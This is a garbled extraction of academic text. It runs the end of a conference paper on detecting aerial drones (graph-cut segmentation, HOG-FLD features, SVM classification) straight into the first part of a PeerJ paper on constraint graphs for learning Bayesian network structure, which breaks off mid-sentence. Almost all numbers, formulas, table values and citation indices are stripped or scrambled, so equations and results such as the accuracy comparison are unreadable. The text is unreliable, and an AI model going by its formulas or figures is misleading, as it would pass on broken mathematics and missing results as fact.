),( is defined as a weight function ),( ji vvw greater than zero. any vertex ji vv , represents the pixel point of the graph to be processed in graph theory, and the weight of any edge represents the gray difference, the distance or some other features between the adjacent pixels of i v , j v and ),( ji vv in an image. using graph cuts algorithm [ ], the graph g is divided into several disjoint independent regions, and the region is defined as )',(' evg  , e' is a subset of e. the regions of the picture is segmented by the algorithm of minimun spanning tree(mst) [ ] that the difference of the pixels in the same region is measured through the maximum weight edge, of which the largest weight edge of segmentation region values are defined as follows: )(max)( ),( ecint ecmste     vc   where c is the generated partition region, and ),( ecmst represents the set of partitioned regions or the minimun spanning tree [ ] that c generates in e. the resulting dissimilarity between pixels within the segmented region could also be understood as the weight of the minimum edge that connects the vertices of two segmented regions, as defined below: )),((min),( ),(,, ji evvcvcv vvwccdif jiji    when there is no edge connection between the two partitioned regions, there is ),( ccdif . the condition for the appearance of its partition boundary is defined as follows:      otherwisefalse ccmintccdififtrue ccd ),(),(, ),(  if true in the expression is satisfied, then the boundary is represented, then the region is segmented. otherwise, it is merged. where the smallest internal difference of division is defined as follows: ))()(),()(min(),( ccintccintccmint    () is a threshold function, which is used to control the merging degree of the image segmentation region, which is defined as ckc /)(  , where c is the number of the segmentation region or the vertex, and k is a constant parameter that is used to control the coarse granularity of its image segmentation area. the segmentation effect is shown in figure (b).that small regions will be merged means detecting whether the segmented region meets the regional boundary conditions, if not, then they will be merged. the regional boundary conditions could be measured by the following four types of similarity in the image: ) color [ ] similarity ),( jicolour rrs means that bins one-dimensional color histogram of the three color channels international conference on sensor network and computer engineering (icsnce ) are acquired after image is normalized. or that means that the three color components are combined into one dimensional feature vector, so that each region of the image could be represented as a dimensional feature vector },...,{ n iii ccc  , and the color calculation formula of the region is: )()( )()( ),min(),( ji jjii t n k k j k ijicolour rsizersize crsizecrsize c ccrrs        where )( irsize is the number of pixels contained in the region( i r ), and the number of pixels contained in the new region is )()( ji rsizersize  . ) texture [ ] similarity ),( jitexture rrs means that calculate gaussian differential for different directions of three color channels separately (its  ), bins one-dimensional histogram of each direction of three color channels is respectively obtained after image is normalized, and then the region could be expressed as a -dimensional vector },...,{ n iii ttt  , and its texture similarity calculation formula is as follows:    n k k j k ijitexture ttrrs ),min(),(  ) dimension similarity ),( jisize rrs , which is used to merge smaller regions as early as possible. its formulas are as follows: )( )()( ),( imsize rsizersize rrs ji jisize    where im refers to the whole image. ) the matching similarity ),( ji rrfill is used to merge the intersected regions as soon as possible. its account form is as follows: )( )()()( ),( imsize rsizersizebbsize rrfill iiij ji   ( ) the similarity set s could be gotten by combining these four kinds of similarity, and the formula of the combination is as follows: ),(),( ),(),(),( jifilljisize jitexturejicolourji rrsarrsa rrsarrsarrs    in order to judge whether the boundary condition of } , {ia satisfies the similarity. the two segmented region blocks i r and j r which have the largest similarity are merged and a region t r is obtained after the similarity degree of the segmented regions in the similarity set s is compared and sorted. the similarity between two adjacent regions of i r and j r in the set s is removed in the meanwhile. then according the step of this method , we begin to calculate the similarity between the new merged region t r and its current adjacent regions, and we add this similarity to the similarity set s again. at the same time, we also add t r to the region set r , and we finally label the region with a rectangular box. the segmentation effect is shown in figure (c) and (d). international conference on sensor network and computer engineering (icsnce ) a) original map b) segmentation of graphs based on graph cuts algorithm c) segmentation graph of the algorithm in this paper d)the partitioned graph after adjusting parameters figure . image segmentation iii. target uav detection based on hog-fld feature fusion and svm detection the method could be divided into two stages from the perspective of practice: training and testing. in the training stage, the window with constant shape and size is used to traverse the whole uav or non-uav sample images, and the feature is extracted by hog-fld feature fusion method. a computable feature vector is obtained to describe the contour of the image, which is robust and easy to classify. the svm classifier [ - ] for uav detection could be obtained by statistical analysis and learning of these eigenvectors. in the early stage of the test, the same method as the training stage is used to extract the feature of the regions to be detected, and the candidate targets of these areas are classified by the trained svm classifier in the later stage to determine if the target in the candidate area is a uav. a. feature extraction from hog-fld feature fusion because the edge contour feature of uav has strong stability and extensibility, the hog feature with strong ability to describe contour is extracted from data set. however, because of the large dimension of hog feature vector, it is unfavorable to the training of classifier. in order to train the classifier with good classification ability, it is necessary to reduce the dimension of extracted hog feature by fld [ ] feature fusion and finally obtain the feature vector with small dimension. to sum up, the feature extraction based on hog-fld feature fusion is adopted in this article. the basis of feature extraction in this article is to extract feature of gradient histogram of oriented gradient (hog). the thought of algorithm is as follows: calculating the gradient of selected image; the whole image is divided into rectangular cells of fixed size and equal size, each cell has pixel including mm ; the cell is divided into undirected channels) or directed channels, and the gradient histogram of each direction is voted on. the voting weight is the gradient value that has been calculated earlier. the divided cell units above are composed of fixed blocks of the same size. each block contains nn  cell elements, which the local eigenvector corresponding to each block is normalized in order to reduce the effect of illumination on the results. the feature vectors of these blocks are combined to form the hog feature vectors of the image. the steps of extracting hog feature are as follows: graying the positive sample image of uav, filtering the input image with gamma correction method so that the image could achieve the standard contrast of color space and reduce the effects of local shadows and light changes on the image; dividing the image into a certain number of cells, and forming a fixed number of cells into a certain number of blocks of equal size as in the preceding paragraph, classifying the gradient range according to the above mentioned rules, we could international conference on sensor network and computer engineering (icsnce ) calculate the cell features in these blocks and finally connect all the blocks together to obtain the feature vector containing the whole target uav image. formula ( ) is a formula for normalizing the image, formula ( ) and formula ( ) could calculate the gradient component of each pixel, formula ( ) and formula ( ) could calculate the size and direction of the gradient. )||/(||  ggg vvv  ), (), (),( yxyxyx pipigx    ) ,() ,(),(   yxyxyx pipigy  ),( ),( ),( yxyxyx gygxs   )/arctan( ),(),(),( yxyxyx gxgy  where  g v is the result of histogram normalization, and gv is the extracted vector histogram; ), ( yxpi  , ), ( yxpi  , ) ,( yxpi , and ) ,( yx pi respectively denote the location of pixel points; ),( yx gx and ),( yx gy respectively denote the coordinate position in the horizontal and vertical directions of the two pixels. and ),( yx s , ),( yx  respectively denote the length of the gradient direction vector and the angle of the gradient direction vector. in this article, a window including * pixel is used to scan the sample image and the image to be detected using a window including × pixel. the scanning step size is pixels (scanning is in horizontal and vertical direction). the window is divided into cells including * pixel and forms * = units. then setting up four adjacent units up and down to the left and right as a block of pixels, a window contains blocks of pixels. a dimensional feature vector named hog feature description value is generated in a window containing pixel blocks according to the calculation steps of hog. its specific hog algorithm is shown in figure : * pixel unit * pixel blocks * pixel window image pixels per step figure . principle diagram of hog algorithm on the basis of hog feature, the linear subspace is constructed by using fisher linear discriminant analysis (fld) [ ]. by calculating the optimal projection matrix, the projection matrix for feature extraction of the training set is obtained, and the similarity of its projection vector is taken as the similarity degree cos s of cosine similarity, which purpose is to reduce the intra-class dispersion w s as much as possible and to increase the inter-class dispersion b s as much as possible (or that is in the training concentration, to make the sample data of the same uav as close as possible, and the sample data of different uav to be far away). in this way, the features with classification ability are extracted. when dealing with a problem that type is c, the mathematical formulas of inter-class dispersion bs and intra-class dispersion w s should be defined as follows: t i c i iib ns )()(       t ik c i ik x w xxs ik )()(        where i  denotes the mean value of class i  ;  means the mean value of total sample; i  means the number of samples of class i  . the optimal projection matrix opt w could be obtained by solving the optimization problem such as formula ( ), where w s must be a nonsingular matrix (or that is international conference on sensor network and computer engineering (icsnce ) the total number of training samples n is greater than the characteristic dimension of uav image): || || maxarg wsw wsw w w t b t w opt   opt w could also be obtained by solving the generalized eigenvalue problem such as the formula ( ):   wsws wb  in order to solve the problem that the intra-class dispersion matrix w s is singular, pca principal component analysis (pca) is used to reduce the dimension of the feature space (dimensionality reduction to n-cu), and then fisher linear discriminant analysis (fld) is used to deal with it. the projection vector y of test sample x is obtained according to formula ( ): xwy t opt   cosine similarity cos s is used as the similarity measure of projection vector y. where the cosine similarity cos s of vector },,,{ n aaaa  and },,,{ n bbbb  is defined as follows: cos |||||||||||||||| , ba ba ba ba s n i ii   b. support vector machine because the support vector machine (svm) proposed by vapnik has the advantages of simple system structure, global optimization, good generalization, and short training and prediction time [ ], this paper uses svm as a machine learning tool to calculate the rule of samples in order to achieve fast and efficient learning sample features and accurate classification purposes. the main idea of svm is to deal with the linear inseparability of the original space by selecting the kernel function of polynomial kernel to correspond the data to the high-dimensional space. when the algorithm is used to realize the two-classification, the sample features such as hog must be extracted from the original space first, and then the sample features in the original space are represented as a vector in the high-dimensional space. in order to minimize the error rate of the two class classification problems, we need to find a hyperplane that is used to divide the two classes in the high dimensional space. let the sample set be ii yx , , where i= , ,...,n, e i rx  , } , {iy is the class identifier. then in e dimensional space, its linear discriminant function is as follows: bxwxg )(  the formula of the classification surface equation is as follows:  bxw  after normalization of the discriminant function, the following conditions must be satisfied for the two types of samples: )( xg  the classification interval could be |||| w , where the maximum requirement |||| w for the classification interval is kept to a minimum, all samples must be correctly classified, and the following conditions must be met: ])[(  bxwy ii  an svm whose inner product function is ),( ji xxk is constructed with the following formulas (which can be understood as the formula for calculating the extreme value of a quadratic function with conditional constraints): ),()( ji n i jiji xxkyyaaaq     its constraints are expressed as:    n i iii yaca , the formulas of the support vector machine that could be calculated are as follows: international conference on sensor network and computer engineering (icsnce ) )),(sgn()(     n i iii bxxkyaxf  among them,  b is a constant parameter, indicating the size of the threshold that needs to be classified. c. sample preparation and classifier training in this article, positive sample images and negative sample images are selected, and original images of positive samples are selected to calculate the aspect ratio of uav. an image that aspect ratio is : is obtained, and the pixels are normalized to * to avoid the effect of image size on the recognition effect. as described in the hog feature section above, each image could produce pixel blocks, and each pixel block could obtain a -dimensional feature vector, so a image will finally produce a dimensional hog feature vector. the extracted hog vector is used as the input vector of fisher linear discriminant analysis algorithm to reduce the dimension of the whole vector. the dimension of the vector is adjustable and its parameter is determined according to the recognition efficiency of the experiment. sending the vector reduced dimension to the svm model, the svm classifier is obtained to detect whether the uav is included in the image under test. iv. parameter analysis and experimental results the environment used in this experiment is that the simulation software of matlab r b based windows on -bit operating system. where cpu of computer is i - and its installed memory is . gb, and the number of the test images are . the best detection effect is obtained by adjusting the important parameters that affect the experimental results. a. parameter selection of fld in the process of extracting feature vector, the dimension that needs to be reduced by fisher linear discriminant analysis algorithm is the parameter k of fld algorithm, which changes with the change of this parameter. the contrast graph of recognition time is shown in figure . it can be seen from the graph that when k is , the whole algorithm has the least recognition time. figure . the time chart with parameter k changed b. experimental effect of aerial uav detection algorithm based on region of interest experiments show that in the whole algorithm, when the number of pixels in the divided blocks is * , svm kernel function type is , when the threshold of segmentation is k= and sigma= , the algorithm has the best overall recognition effect on accuracy rate and time, and the recognition result is shown in figure : picture(a) picture (b) picture (c) picture (d) figure . identification results c. comparison of detection effect of traditional hog-svm uav detection algorithm in order to verify the efficiency of the proposed method, the experimental results of the proposed method are compared with the experimental results of the hog and svm method based on image segmentation, and the experimental results are obtained by statistics. as shown in table i, and the average recognition time of this method is faster than that of the latter method. international conference on sensor network and computer engineering (icsnce ) table i. comparison results of the test methods test method accuracy rate time hog-fld+svm . % . s hog+svm . % . s v. tag the mechanism based on the region of interest to obtain the region of interest is used in this article. in the testing phase, the acquired regions of interest are input into the trained svm classifier, which reduces the recognition time. the dimension reduction of fisher linear discriminant analysis (fld) makes svm easy to train and in the phase of feature vector extraction. compared the hog-svm detection method based on image segmentation with the region of interest based aerial uav detection algorithm, this paper uses matlab to carry out simulation experiments. the experimental results show that the detection algorithm based on region of interest is better than the sliding window method based on image segmentation to detect uav in terms of accuracy and time. acknowledgment fund projects: key projects in the industrial field of shaanxi ( ktzdgy - ), scientific research program funded by shaanxi provincial education department ( jk ), national natural science foundation of china ( ), state and provincial joint engineering lab. of advanced network and monitoring control (gsysj ), scientific research program funded by shaanxi provincial education department ( jk ). references [ ] j. barron, d. fleet, s. beauchemin, “performance of optical flow techniques,” international journal of computer vision, vol. , pp. - , . [ ] a. lipton, h. fujiyoshi, r. patil, “moving target classification and tracking from real-time video,” proc ieee workshop on applications of computer vision, , pp. - , . [ ] dalaln, triggs b, “histograms of oriented gradients for human detection,” proc ieee conference on computer vision and pattern recognition, pp. - , . [ ] qiang zhu, shai avidan, mei chen yeh, and kwang ting cheng, “fast human detection using a cascade of histograms of oriented gradients,” proc.ieee international conference on computer vision and pattern recognition, . [ ] suard f, akotomamonjy a r, bensrhair a, etal, “pedestrain detection using infrared images and histograms of oriented gradients,” proceedings intelligent vehicle symposium, pp. - , . [ ] felzenszwalb p f, huttenlocher d p, “efficient graph-based image segmentation,” internatinal journal of computer vision, vol. , pp. - , . [ ] humayun a, li f, rehg j m. rigor, “reusing inference in graph cuts for generating object regions,” proc.ieee computer vision and pattern recognition, pp. - , . [ ] vapnik v n, “ the nature of statistical learning theory,” springer-verlag, new york , pp. - , . [ ] guo mingwei, zhaoyuzhou, xiang junping, etal, “a survey of target detection algorithms based on support vector machine,” control and decision, vol. , pp. - , . [ ] zhang han, he dongjian, “an image segmentation method based on texture information and graph theory,” computer science and engineering, vol. , pp. - , . [ ] zhai jiyou, zhuang yan, “significant detection of boundary prior and adaptive region merging ,” computer engineering and application, . [ ] chen shanchao, fu hongguang, wang ying, “application of an improved graph segmentation method in tongue image segmentation,” computer engineering and application, vol. , pp. - , . [ ] yan yu, song wei, “color and texture mixed descriptor image retrieval method,” computer science and exploration, pp. - , . [ ] ye qing, hu changbiao, “an improved image segmentation method based on graph theory,” computer and modernization, vol. , pp. - , . [ ] sande k e a v d, uijlings j r r, gevers t, etal, “segmentation as selective search for object recognition,” international conference on computer vision. ieee computer society, pp. - , . [ ] girshick r, donahue j, darrell t, etal, “rich feature hierarchies for accurate object detection and semantic segmentation,” computer science, pp. - , . [ ] wang ping, wei zheng, cui weihong, “a minimum spanning tree image segmentation criterion based on statistical learning theory,” information science edition, journal of wuhan university, vol. , pp. - , . [ ] belhumeur p, kriegman d, “eigenfaces vs. fisherfaces: recognition using class specific linear projection,” ieee transactions on pattern analysis and machine intelligence, vol. , pp. - , . submitted march accepted june published july corresponding author jacob m. schreiber, jmschr@cs.washington.edu academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright schreiber and and noble distributed under creative commons cc-by . open access finding the optimal bayesian network given a constraint graph jacob m. schreiber and william s. noble department of computer science, university of washington, seattle, wa, united states of america department of genome science, university of washington, seattle, wa, united states of america abstract despite recent algorithmic improvements, learning the optimal structure of a bayesian network from data is typically infeasible past a few dozen variables. fortunately, domain knowledge can frequently be exploited to achieve dramatic computational savings, and in many cases domain knowledge can even make structure learning tractable. several methods have previously been described for representing this type of structural prior knowledge, including global orderings, super-structures, and constraint rules. while super-structures and constraint rules are flexible in terms of what prior knowledge they can encode, they achieve savings in memory and computational time simply by avoiding considering invalid graphs. we introduce the concept of a ‘‘constraint graph’’ as an intuitive method for incorporating rich prior knowledge into the structure learning task. we describe how this graph can be used to reduce the memory cost and computational time required to find the optimal graph subject to the encoded constraints, beyond merely eliminating invalid graphs. in particular, we show that a constraint graph can break the structure learning task into independent subproblems even in the presence of cyclic prior knowledge. these subproblems are well suited to being solved in parallel on a single machine or distributed across many machines without excessive communication cost. subjects artificial intelligence, data mining and machine learning, data science, distributed and parallel computing keywords bayesian network, structure learning, discrete optimization, parallel processing, big data introduction bayesian networks are directed acyclic graphs (dags) in which nodes correspond to random variables and directed edges represent dependencies between these variables. conditional independence between a pair of variables is represented as the lack of an edge between the two corresponding nodes. the parameters of a bayesian network are typically simple to interpret, making such networks highly desirable in a wide variety of application domains that require model transparancy. frequently, one does not know the structure of the bayesian network beforehand, making it necessary to learn the structure directly from data. the most intuitive approach to the task of bayesian network structure learning (bnsl) is ‘‘search-and-score,’’ in which one iterates over all possible dags and chooses the one that optimizes a given scoring function. recent work has described methods that find the optimal bayesian network structure without explicitly considering all possible dags (malone, yuan & hansen, ; yuan, malone & how to cite this article schreiber and and noble ( ), finding the optimal bayesian network given a constraint graph. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jmschr@cs.washington.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. wu, ; fan, malone & yuan, ; jaakkola et al., ), but these methods are still infeasible for more than a few dozen variables. in practice, a wide variety of heuristics are often employed for larger datasets. these algorithms, which include branch-and- bound (suzuki, ), chow-liu trees (chow & liu, ), optimal reinsertion (moore & wong, ), and hill-climbing (tsamardinos, brown & aliferis, ), typically attempt to efficiently identify a structure that captures the majority of important dependencies. in many applications, the search space of possible network structures can be reduced by taking into account domain-specific prior knowledge (gamberoni et al., ; zuo & kita, ; schneiderman, ; zhou & sakane, ). a simple method is to specify an ordering on the variables and require that parents of a variable must precede it in the ordering (cooper & herskovits, ). this representation leads to tractable structure learning because identifying the parent set for each variable can be carried out independently from the other variables. unfortunately, prior knowledge is typically more ambiguous than knowing a full topological ordering and may only exist for some of the variables. a more general approach to handling prior knowledge is to employ a ‘‘super-structure,’’ i.e., an undirected graph that defines the super-set of edges defining valid learned structures, forbidding all others (perrier, imoto & miyano, ). this method has been fairly well studied and can also be used as a heuristic if defined through statistical tests instead of prior knowledge. a natural extension of the undirected super-structure is the directed super-structure (ordyniak & szeider, ), but to our knowledge the only work done on directed super-structures proved that an acyclic directed super-structure is solvable in polynomial time. an alternate, but similar, concept is to define which edges must or cannot exist as a set of rules (campos & ji, ). however, these rule-based techniques do not specify how one would exploit the constraints to reduce the computational time past simply skipping over invalid graphs. we propose the idea of a ‘‘constraint graph’’ as a method for incorporating prior information into the bnsl task. a constraint graph is a directed graph where each node represents a set of variables in the bnsl problem and edges represent which variables are candidate parents for which other variables. the primary advantage of constraint graphs versus other methods is that the structure of the constraint graph can be used to achieve savings in both memory cost and computational time beyond simply eliminating invalid structures. this is done by breaking the problem into independent subproblems even in the presence of cyclic prior knowledge. an example of this cyclic prior knowledge is identifying two groups of variables that can draw parents only from each other, similar to a biparte graph. it can be difficult to identify the best parents for each variable that does not result in a cycle in the learned structure. in addition, constraint graphs are visually more intuitive than a set of written rules while also typically being simpler than a super-structure, because constraint graphs are defined over sets of variables instead of the original variables themselves. this intuition, combined with automatic methods for identifying parallelizable subproblems, makes constraint graphs easy for non-experts to define and use without requiring them to know the details of the structure learning task. this technique is similar to work done by fan, malone & yuan ( ), where the authors describe the same computational gains through the identification of ‘‘potentially optimal schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. group using constraint graph use constraints to guide structure learning a b d de�ne directed super-structure c figure a constraint graph grouping variables. (a) we wish to learn a bayesian network over variables. the variables are colored according to the group that they belong to, which is defined by the user. these variables can either (b) be organized into a directed super structure or (c) grouped into a constraint graph to encode equivalent prior knowledge. both graphs define the superset of edges which can exist, but the constraint graph uses far fewer nodes and edges to encode this knowledge. (d) either technique can then be used to guide the bnsl task to learn the optimal bayesian network given the constraints. parent sets.’’ one difference is that fan et al. define the constraints on individual variables instead of on sets on variables, as this work does. by defining the constraints on sets of variables instead of individual ones, one can identify further computational gains when presented with cyclic prior knowledge. given that two types of graphs will be discussed throughout this paper, the bayesian network we are attempting to learn and the constraint graph, we will use the terminology ‘‘variable’’ exclusively in reference to the bayesian network and ‘‘node’’ exclusively in reference to the constraint graph. constraint graphs a constraint graph is a directed graph in which nodes contain disjoint sets of variables from the bnsl task, and edges indicate which sets of variables can serve as parents to which other sets of variables. a self-loop in the constraint graph indicates that no prior knowledge is known about the relationship between variables in that node, whereas a lack of a self-loop indicates that no variables in that particular node can serve as parents for another variable in that node. thus, the naive bnsl task can be represented as a constraint graph consisting of a single node with a self-loop. a constraint graph can be thought of as a way to group the variables (fig. a), define relationships between these groups (fig. c), and then guide the bnsl task to efficiently find the optimal structure given these constraints (fig. d). in contast, a directed super-structure defines all possible edges that can exist in accordance with the prior knowledge (fig. b). typically, a directed super-structure is far more complicated than the equivalent constraint graph. cyclic prior knowledge can be represented as a simple cycle in the constraint graph, such that the variables in node a draw their parents solely from node b, and b from a. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. any method for reducing computational time through prior knowledge exploits the ‘‘global parameter independence property’’ of bnsl. briefly, this property states that the optimal parents for a variable are independent of the optimal parents for another variable given that the variables do not form a cycle in the resulting bayesian network. this acyclicity requirement is typically computationally challenging to determine because a cycle can involve more variables than the ones being directly considered, such as a graph which is simply a directed loop over all variables. however, given an acyclic constraint graph or an acyclic directed super-structure, it is impossible to form a cycle in the resulting structure; hence, the optimal parent set for each variable can be identified independently from all other variables. a convenient property of constraint graphs, and one of their advantages relative to other methods, is that independent subproblems can be found through global parameter independence even in constraint graphs which contain cycles. we describe in ‘solving a component of the constraint graph’ the exact algorithm for finding optimal parent sets for each case one can encounter in a constraint graph. briefly, the constraint graph is first broken up into its strongly connected components (sccs) that identify which variables can have their parent sets found independently from all other variables (‘‘solving a component’’) without the possibility of forming a cycle in the resulting graph. typically these sccs will be single nodes from the constraint graph, but may be comprised of multiple nodes if cyclic prior knowledge is being represented. in the case of an acyclic constraint graph, all sccs will be single nodes, and in fact each variable can be optimized without needing to consider other variables, in line with theoretical results from ordyniak & szeider ( ). in addition to allowing these problems to be solved in parallel, this breakdown suggests a more efficient method of sharding the data in a distributed learning context. specifically, one can assign an entire scc of the constraint graph to a machine, including all columns of data corresponding to the variables in that scc and all variables in nodes which are parents to nodes in the scc. given that all subproblems which involve this shard of the data are contained in this scc of the constraint graph, there will never be duplicate shards and all tasks involving a shard are limited to the same machine. the concept of identifying sccs as independent subproblems has also been described in fan, malone & yuan ( ). it is possible to convert any directed super-structure into a constraint graph and vice- versa though it is far simpler to go from a constraint graph to a directed super-structure. to convert from a directed super-structure to a constraint graph, one must first identify all strongly connected components that are more than a single variable. all variables in a strongly connected component can be put into the same node in a constraint graph that contains a self loop. then, one would tabulate the unique parent and children sets a variable can have. all variables outside of the previously identified strongly connected components with the same parent and children sets can be grouped together into a node in the constraint graph. edges then connect these sets based on the shared parent sets specified for each node. in the situation where a node in the constraint graph can draw parents from only a subset of the variables in a node created by the identification of the strongly connected components, the node must be broken into two nodes that both have self loops and loops connecting to each other to allow for only a subset of those variables schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to serve as a parent for another node. in contrast, to convert from a constraint graph to a directed super-structure one would simply draw, for each node, an edge from all variables in the current node to all variables in the node’s children. we suggest that constraint graphs are the more intuitive method both due to their simpler representation and ease of extracting computational benefits from the task. methods bayesian network structure learning although solving a component in a constraint graph can be accomplished by a variety of algorithms including heuristic algorithms, we assume for this paper that one is using some variant of the exact dynamic programming algorithm proposed by malone, yuan & hansen ( ). we briefly review that algorithm here. the goal of the algorithm is to identify the optimal bayesian network defined over the set of variables without having to repeat any calculations and without having to use excessive memory. this is done by defining additional graphs, the parent graphs and the order graph. we will refer to each node in these graphs as ‘‘entries’’ to distinguish them from the constraint graph and the learned bayesian network. a parent graph is defined for each variable and can be defined as a lattice, where the entries to some layer i correspond to combinations of all other variables of size i. each entry is connected to the entries in the previous layers that are subsets of that entry such that (x ,x ) would be connected to both x and x . for each entry, the score of the variable is calculated using the parents in the entry and compared to the scores held in the parent entries, recording only the best scoring value and parent set amongst them. these entries then hold the dynamically calculated best parent set and associated score, allowing for constant time lookups later on the best parent set given a set of possible parents. the order graph is structured in the same manner as the parent graphs except over all variables. in contrast with the parent graphs, it is the edges that store useful information in the form of the score associated with adding a given variable to the set of seen variables stored in the entry and the parent set that yields this score. each path from the empty root node to the leaf node containing the full set of variables encodes the optimal network given a topological sort of the variables, and the shortest path encodes the optimal network. this data structure reduces the time required to find the optimal bayesian network from o(n n(n− )) time in the number of variables to o(n n) time in the number of variables without the need to keep a large cache of values. structure learning is flexible with respect to the score function used to identify the optimal graph. there are many score functions that typically aim to penalize the log likelihood of the data by the complexity of the graph to encourage sparser structures. these usually come in the form of bayesian score functions, such as bayesian-dirichlet (heckerman, geiger & chickering, ), or those derived from information theory, such as minimum description length (mdl) (suzuki, ). most score functions decompose across variables of a bayesian network according to the global parameter independence property, such that the score for a dataset given a model is equal to the product of the score of each variable given its parents. while constraint graphs remain agnostic to the specific schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. score function used, we assume that mdl is used as it has several desirable computational benefits. for review, mdl defines the score as the following: mdl(d|m)=p(d|m)− log(n)|b| ( ) where |b| defines the number of parameters in the network. the term ‘‘minimum description length’’ arises from needing log(n) bits to represent each parameter in the model, making the second term the total number of bits needed to represent the full model. the mdl score function has the convenient property that a variable cannot have more than log ( n log(n) ) parents given n samples, greatly reducing computational time. solving a component of the constraint graph the strongly connected components of a constraint graph can be identified using tarjan’s algorithm (tarjan, ). each scc corresponds to a subproblem of the constraint graph and can be solved independently. in many cases the scc will be a single node of the constraint graph, because prior knowledge is typically not cyclic. in general, the sccs of a constraint graph can be solved in any order due to the global parameter independence property. the algorithm for solving an scc of a constraint graph is a straightforward modification of the dynamic programming algorithm described above. specifically, parent graphs are created for each variable in the scc but defined only over the union of possible parents for that variable. consider the case of a simple, four-node cycle with no self-loops such that w →x →y →z →w . a parent graph is defined for each variable in w ∪x∪y ∪z but only over valid parents. for example, the parent graph for x would be over only variables in w . then, an order graph is defined with entries that violate the edge structure of the constraint graph filtered out. the first layer of the order graph would be unchanged with only singletons, but the second layer would prohibit entries with two variables from the same layer because there are no valid orderings in which xi is a parent of xj, and would prohibit entries in which a variable w is joined with a variable of y . one can identify valid entries by taking the entries of a previous layer and iterating over each variable present, adding all valid parents for that variable which are not already present in the set. a simple example illustrating the algorithm is a constraint graph made up of a four node cycle where each node contains only a single variable (fig. a). the parent graphs defined for this would consist solely of two entries, the null entry and the entry corresponding to the only valid parent. the first layer of the order graph would be all variables as previously (fig. b). however, once a variable is chosen to start the topological ordering the order of the remaining variables is fixed because of the constraints, producing a far simpler lattice. because constraint graphs can encode a wide variety of different constraints, the complexity of the task depends on the structure of the constraint graph. broadly, the results from ordyniak & szeider ( ) still hold, namely, that acyclic constraint graphs can be solved in quadratic time. as was found in fan, malone & yuan ( ), because each scc can be solved independently, the time complexity for constraint graphs containing a cycle corresponds to the time complexity of the worst case component. fortunately, although schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( , ) ( , , ) ( , , , ) ( , ) ( , , ) ( ,) ( ,) ( ,) ( , ) ( , , ) ( ,) ( , ) ( , , ) (,) a b figure an example of a constraint graph and resulting order graph. (a) a constraint graph is defined as a cycle over four nodes with each node containing a single variable. (b) the resulting order graph dur- ing the bnsl task. it is significantly sparser than the typical bnsl task because after choosing a variable to start the topological ordering the remaining variables must be added in the order defined by the cycle. the complexity of a node engaging in a cycle is still exponential, it is only exponential with respect to the number of variables that node interacts with. adding additional, equally sized nodes to the constraint graph only causes the algorithm to grow linearly in time and has no additional memory cost if the components are solved sequentially. the algorithm described above has five natural cases and are described below. one node, no parents, no self loop: the variables in this node contain no parents, so nothing needs to be done to find the optimal parent sets given the constraints. this naturally takes o( ) time to solve. one node, no parents, self loop: this is equivalent to exact bnsl with no prior knowledge. in this case, the previously proposed dynamic programming algorithm is used to identify the optimal structure of the subnetwork containing only variables in this node. this takes o(n n) time where n is the number of variables in the node. one node, one or more parent nodes, no self loop: in this case it is impossible for a cycle to be formed in the resulting bayesian network regardless of optimal parent sets, so we can justify solving every variable in this node independently by the global parameter independence property. doing so results in a significant improvement over applying the algorithm naively because neither the parent graphs nor the order graph need to be explicitly calculated or stored. the optimal parent set can be calculated without the need for dynamic programming because the optimal topological ordering does not need to be discovered. because no dynamic programming needs to be done, there is no need to store either the parent or order graphs in memory. this takes o(nmk) time, where n is the number of variables in the node, m is the number of possible parents, and k is the maximum number of parents that a node can have, in this case set by the mdl algorithm. if k is set to any constant value, then this step requires quadratic time with respect to the number of possible parents and linear with respect to the number of variables in the node. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. one node, one or more parents, self loop: initially, one may think that solving this scc could involve taking the union of all variables from all involved nodes, running exact bnsl over the full set, and simply discarding the parent sets learned for the variables not in the currently considered node. however, in the same way that one should not handle prior knowledge by learning the optimal graph over all variables and discarding edges which offend the prior knowledge, one should not do the same in this case. instead, a modification to the dynamic programming algorithm itself can be made to restrict the parent sets on a variable-by-variable basis. for simplicity, we define the variables in the current node of the constraint graph as x and the union of all variables in the parent nodes in the constraint graph as y . we begin by setting up an order graph, as usual defined over x. we then add y to each node in the order graph such that the root node now is now comprised of y instead of the empty set and the leaf node is comprised of x∪y instead of just x. because the primary purpose of the order graph is to identify the optimal parent sets that do not form cycles, this addition is intuitive because it is impossible to form a cycle by including any of the variables in y as parents for any of the variables in x. in other words, if one attempted to find the optimal topological ordering over x∪y it would always begin with the variables in y but would be invariant to the ordering of y . parent graphs are then created for all variables in x but are defined over the set of all variables in x∪y , because that is the full set of parents that the variables could be drawn from. this restriction allows the optimal parents for each variable in x to be identified without wasting time considering what the parent set for variables in y should be, or potentially throwing away the optimal graph because of improper edges leading from a variable in y to a variable in x. this step takes o(n n+m) time, where n is the number of variables in the node and m is the number of variables in the parent nodes. this is because we only need to define a parent graph for the variables in the node we are currently considering, but these parent graphs must be defined over all variables in the node plus all the variables in the parent nodes. multiple nodes: the algorithm as presented initially is used to solve an entire component at the same time. results while it is intuitive how a constraint graph provides computational gains by splitting the structure learning task into subproblems, we have thus far only alluded to the idea that prior knowledge can provide efficiencies past that. in this section we examine the computational gains achieved in the three non-trivial cases of the algorithm presented in ‘solving a component of the constraint graph’. acyclic constraint graphs can model the global stock market first, we examine the computational benefits of an acyclic constraint graph modeling the global stock market. in particular, we want to identify for each stock which other stocks are predictive to its performance. we chose to do this by learning a bayesian network over the opening and closing prices of top performing stocks from the new york stock exchange (nyse) in the united states, the tokyo stock exchange (tse) in japan, and the financial times stock exchange (ftse) in england. learning a bayesian 